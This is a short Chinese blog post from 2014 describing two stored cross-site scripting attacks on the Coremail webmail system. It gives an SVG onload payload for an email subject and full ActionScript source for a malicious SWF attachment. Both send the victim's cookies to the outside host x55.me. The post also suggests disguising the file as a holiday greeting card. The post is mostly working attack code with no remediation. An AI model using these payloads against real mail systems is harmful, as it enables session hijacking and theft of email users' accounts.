Coremail邮件系统存储型XSS两个

(1):Coremail邮件系统存储型XSS之一

给受害者发送主题如下的邮件:

<svg onload='img=new Image();img.src="//x55.me/geo.php?get="+document.cookie;'>



当受害者试图打开邮件时,cookie将会被窃取:




(2):Coremail邮件系统存储型XSS之二

将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf):
swf文件的AS代码如下(将就着看吧,东拼西凑整出来的):



package {

    import flash.external.ExternalInterface;

    import flash.display.Sprite;

    import flash.display.Sprite;

    import flash.events.Event;

    import flash.net.URLLoader;

    import flash.net.URLRequest;

    import flash.text.TextField;

    import flash.text.TextFieldAutoSize;

    import flash.xml.*;

    import flash.events.IOErrorEvent;

    import flash.events.*;

    import flash.net.*;

    /**

     * @author User

     */



    



     public class csrf extends Sprite {

        

        private var loader:URLLoader;

        public function csrf() {

            var res:String = ExternalInterface.call("function(){return document.cookie;}");

            doGet(res);

        }

        

        private function doGet(res:String):void{

            loader = new URLLoader();

            var target:String = "http://x55.me/geo.php?get="+res;

            var request:URLRequest = new URLRequest(target);

            try {

                loader.load(request);

            } catch (error:Error) {

                sendDatatoJS("Error: " + error.getStackTrace());

            }

        }

        

        private function sendDatatoJS(data:String):void{

            trace(data);

            ExternalInterface.call("colsole.log", data);

        }

    }

    

    

}

 

一旦受害者打开附件里的swf文件,其cookies就会发送到攻击者的站点。
posted @ 2014-10-21 09:42  Hookjoy  阅读(877)  评论(0编辑  收藏  举报